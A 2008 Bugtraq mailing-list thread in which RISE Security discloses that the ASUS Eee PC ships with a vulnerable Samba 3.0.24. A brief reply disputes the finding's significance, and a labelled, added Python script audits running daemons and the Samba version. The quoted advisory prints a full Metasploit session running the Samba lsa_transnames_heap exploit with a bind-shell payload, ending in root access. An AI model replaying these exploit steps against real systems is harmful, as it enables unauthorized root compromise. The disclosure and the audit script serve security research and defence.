Re: RE: ASUS Eee PC rooted out of the box
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Hi,
Considering that there are no updates available for Samba on the ASUS Eee
PC (it runs a modified version of Samba as far as we know; the SMB protocol
is only partially supported), and even considering the fact that it is
Linux and not Microsoft Windows (the main reason that made us write this
blog post), we think it is not the same scenario.
Best regards,
RISE Security
Bug traq wrote:
> I bought a new beautiful ACER with windows XP... the first thing i looked at
> is the Windows XP SP2 without upgrades ... o my fucking GOD... i can exploit
> it with metasploit !!!!!!!!! i dont believe ... lets upgrade ?? ok ... no
> more exploitation
> :(
>
> You see ... is the same scenario :)
>
> lol
>
>
> -----Original Message-----
> From: RISE Security [mailto:advisories@xxxxxxxxxxxxxxxx]
> Sent: Friday, February 08, 2008 2:47 PM
> To: bugtraq@xxxxxxxxxxxxxxxxx
> Subject: ASUS Eee PC rooted out of the box
>
> We recently acquired an ASUS Eee PC (if you want to know more about it,
> a lot of reviews are available on the internet). The first thing we did when
> we put our hands on the ASUS Eee PC was to test its security. The ASUS
> Eee PC comes with a customized version of the Xandros operating system
> installed, and some other bundled software like Mozilla Firefox, Pidgin,
> Skype and OpenOffice.org.
>
> Analysing the running processes of the ASUS Eee PC, the first thing that
> caught our attention was the running smbd process (the sshd daemon was
> started by us, and is not enabled by default).
>
>
> eeepc-rise:/root> ps -e
> PID TTY TIME CMD
> 1 ? 00:00:00 fastinit
> 2 ? 00:00:00 ksoftirqd/0
> 3 ? 00:00:00 events/0
> 4 ? 00:00:00 khelper
> 5 ? 00:00:00 kthread
> 25 ? 00:00:00 kblockd/0
> 26 ? 00:00:00 kacpid
> 128 ? 00:00:00 ata/0
> 129 ? 00:00:00 ata_aux
> 130 ? 00:00:00 kseriod
> 148 ? 00:00:00 pdflush
> 149 ? 00:00:00 pdflush
> 150 ? 00:00:00 kswapd0
> 151 ? 00:00:00 aio/0
> 152 ? 00:00:00 unionfs_siod/0
> 778 ? 00:00:00 scsi_eh_0
> 779 ? 00:00:00 scsi_eh_1
> 799 ? 00:00:00 kpsmoused
> 819 ? 00:00:00 kjournald
> 855 ? 00:00:00 fastinit
> 857 ? 00:00:00 sh
> 858 ? 00:00:00 su
> 859 tty3 00:00:00 getty
> 862 ? 00:00:00 startx
> 880 ? 00:00:00 xinit
> 881 tty2 00:00:06 Xorg
> 890 ? 00:00:00 udevd
> 952 ? 00:00:00 ksuspend_usbd
> 953 ? 00:00:00 khubd
> 1002 ? 00:00:00 acpid
> 1027 ? 00:00:00 pciehpd_event
> 1055 ? 00:00:00 ifplugd
> 1101 ? 00:00:00 scsi_eh_2
> 1102 ? 00:00:00 usb-storage
> 1151 ? 00:00:00 icewm
> 1185 ? 00:00:01 AsusLauncher
> 1186 ? 00:00:00 icewmtray
> 1188 ? 00:00:01 powermonitor
> 1190 ? 00:00:00 minimixer
> 1191 ? 00:00:00 networkmonitor
> 1192 ? 00:00:00 wapmonitor
> 1193 ? 00:00:00 x-session-manag
> 1195 ? 00:00:00 x-session-manag
> 1200 ? 00:00:00 x-session-manag
> 1201 ? 00:00:00 dispwatch
> 1217 ? 00:00:00 cupsd
> 1224 ? 00:00:00 usbstorageapple
> 1234 ? 00:00:00 kondemand/0
> 1240 ? 00:00:00 portmap
> 1248 ? 00:00:00 keyboardstatus
> 1272 ? 00:00:00 memd
> 1279 ? 00:00:00 scim-helper-man
> 1280 ? 00:00:00 scim-panel-gtk
> 1282 ? 00:00:00 scim-launcher
> 1297 ? 00:00:00 netserv
> 1331 ? 00:00:00 asusosd
> 1476 ? 00:00:00 xandrosncs-agen
> 1775 ? 00:00:00 dhclient3
> 2002 ? 00:00:00 nmbd
> 2004 ? 00:00:00 smbd
> 2005 ? 00:00:00 smbd
> 2322 ? 00:00:00 sshd
> 2345 ? 00:00:00 sshd
> 2356 pts/0 00:00:00 bash
> 2362 pts/0 00:00:00 ps
> eeepc-rise:/root>
>
>
> Retrieving the smbd version, we discovered that it runs a vulnerable
> version of Samba (Samba lsa_io_trans_names Heap Overflow), for which we
> published an exploit earlier last year.
>
>
> eeepc-rise:/root> smbd --version
> Version 3.0.24
> eeepc-rise:/root>
>
>
> With this information, we ran our exploit against the ASUS Eee PC using
> the Debian/Ubuntu target (Xandros is based on Corel Linux, which is
> Debian based).
>
>
> msf > use linux/samba/lsa_transnames_heap
> msf exploit(lsa_transnames_heap) > set RHOST 192.168.50.10
> RHOST => 192.168.50.10
> msf exploit(lsa_transnames_heap) > set PAYLOAD linux/x86/shell_bind_tcp
> PAYLOAD => linux/x86/shell_bind_tcp
> msf exploit(lsa_transnames_heap) > show targets
>
> Exploit targets:
>
> Id Name
> -- ----
> 0 Linux vsyscall
> 1 Linux Heap Brute Force (Debian/Ubuntu)
> 2 Linux Heap Brute Force (Gentoo)
> 3 Linux Heap Brute Force (Mandriva)
> 4 Linux Heap Brute Force (RHEL/CentOS)
> 5 Linux Heap Brute Force (SUSE)
> 6 Linux Heap Brute Force (Slackware)
> 7 DEBUG
>
>
> msf exploit(lsa_transnames_heap) > set TARGET 1
> TARGET => 1
> msf exploit(lsa_transnames_heap) > exploit
> [*] Started bind handler
> [*] Creating nop sled....
> ...
> [*] Trying to exploit Samba with address 0x08415000...
> [*] Connecting to the SMB service...
> [*] Binding to
> 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.50.10[\lsarpc] ...
> [*] Bound to
> 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.50.10[\lsarpc] ...
> [*] Calling the vulnerable function...
> [+] Server did not respond, this is expected
> [*] Command shell session 1 opened (192.168.50.201:33694 ->
> 192.168.50.10:4444)
> msf exploit(lsa_transnames_heap) > sessions -i 1
> [*] Starting interaction with 1...
>
> uname -a
> Linux eeepc-rise 2.6.21.4-eeepc #21 Sat Oct 13 12:14:03 EDT 2007 i686
> GNU/Linux
> id
> uid=0(root) gid=0(root) egid=65534(nogroup) groups=65534(nogroup)
>
>
> Easy to learn, Easy to work, Easy to root.
>
>
> The original blog post and more information can be found in our
> website at http://risesecurity.org/.
>
> Best regards,
> RISE Security
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.6 (GNU/Linux)
iD8DBQFHrK6ShFjK78TGSUERAs43AJ4tM1eo5bZhdO9GgMbZhuGEWl5uYACeLHpe
FJidpsyWDBktb6rCNp3b520=
=TQQu
-----END PGP SIGNATURE-----
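The quoted advisory boils down to two checks a defender would want to script before putting a freshly unboxed device on a network: which network-facing daemons are running by default, and whether the Samba build is one the advisory names as affected. The script below is an added example and is not code from the thread or from RISE Security. It parses `ps -e` and `smbd --version` output (the sample input is constructed to mirror the listing in the thread), flags the listening daemons, and compares the Samba version against 3.0.24 using tuple comparison rather than string comparison. That 3.0.24 is affected comes from the advisory; treating every earlier 3.0.x release as affected as well, the list of daemons worth flagging, and the port numbers in the descriptions are assumptions made for this example.

```python
"""Audit a Linux device's default-running network daemons and Samba version.

Added example, not part of the Bugtraq thread. The two checks mirror the
steps in the quoted advisory: inspect the process list for listening
daemons, then compare the reported Samba version against the release the
advisory names as vulnerable to the lsa_io_trans_names heap overflow.
"""
import re
from typing import Dict, List, Tuple

# Daemons worth flagging when found running on a freshly unboxed device.
# This set (and the ports named) is an assumption for the example.
NETWORK_DAEMONS = {
    "smbd": "Samba file/print server (SMB/CIFS, TCP 139/445)",
    "nmbd": "Samba NetBIOS name service (UDP 137/138)",
    "portmap": "ONC RPC portmapper (TCP/UDP 111)",
    "cupsd": "CUPS print server (TCP 631)",
    "sshd": "OpenSSH server (TCP 22)",
}

# The advisory reports 3.0.24 as vulnerable. Treating every earlier release
# as affected too is an assumption made for this example.
LAST_AFFECTED_SAMBA = (3, 0, 24)

PS_LINE = re.compile(r"^\s*(\d+)\s+(\S+)\s+(\d\d:\d\d:\d\d)\s+(\S+)\s*$")
VERSION_LINE = re.compile(r"Version\s+(\d+)\.(\d+)\.(\d+)")


def parse_ps(output: str) -> List[Tuple[int, str]]:
    """Return (pid, command) pairs from `ps -e` output, skipping the header."""
    procs = []
    for line in output.splitlines():
        m = PS_LINE.match(line)
        if m:
            procs.append((int(m.group(1)), m.group(4)))
    return procs


def running_network_daemons(output: str) -> Dict[str, List[int]]:
    """Map each flagged daemon name to the PIDs it is running under."""
    found: Dict[str, List[int]] = {}
    for pid, cmd in parse_ps(output):
        if cmd in NETWORK_DAEMONS:
            found.setdefault(cmd, []).append(pid)
    return found


def parse_samba_version(output: str) -> Tuple[int, int, int]:
    """Extract (major, minor, patch) from `smbd --version` output."""
    m = VERSION_LINE.search(output)
    if not m:
        raise ValueError("no 'Version X.Y.Z' line in smbd --version output")
    major, minor, patch = (int(x) for x in m.groups())
    return (major, minor, patch)


def samba_is_affected(version: Tuple[int, int, int]) -> bool:
    """True when the build is at or below the last affected release.
    Tuple comparison avoids the string trap where '3.0.9' > '3.0.24'."""
    return version <= LAST_AFFECTED_SAMBA


def audit(ps_output: str, smbd_version_output: str) -> List[str]:
    """One finding per flagged daemon, plus the Samba version verdict."""
    findings = []
    daemons = running_network_daemons(ps_output)
    for name, pids in sorted(daemons.items()):
        findings.append(f"{name} running (pids {pids}): {NETWORK_DAEMONS[name]}")
    if "smbd" in daemons:
        ver = parse_samba_version(smbd_version_output)
        verdict = "AFFECTED" if samba_is_affected(ver) else "not affected"
        findings.append(
            f"Samba {'.'.join(map(str, ver))} is {verdict} by the "
            f"lsa_io_trans_names heap overflow (last affected: "
            f"{'.'.join(map(str, LAST_AFFECTED_SAMBA))})"
        )
    return findings


# Constructed sample input modelled on the thread's `ps -e` listing.
SAMPLE_PS = """\
  PID TTY          TIME CMD
    1 ?        00:00:00 fastinit
 1217 ?        00:00:00 cupsd
 1240 ?        00:00:00 portmap
 2002 ?        00:00:00 nmbd
 2004 ?        00:00:00 smbd
 2005 ?        00:00:00 smbd
 2356 pts/0    00:00:00 bash
"""
SAMPLE_VERSION = "Version 3.0.24\n"

if __name__ == "__main__":
    for line in audit(SAMPLE_PS, SAMPLE_VERSION):
        print(line)
```

On a real device, feed the script the output of `ps -e` and `smbd --version` instead of the constructed samples; the version check is deliberately done on integer tuples because a naive string comparison would rank 3.0.9 above 3.0.24 and miss affected builds.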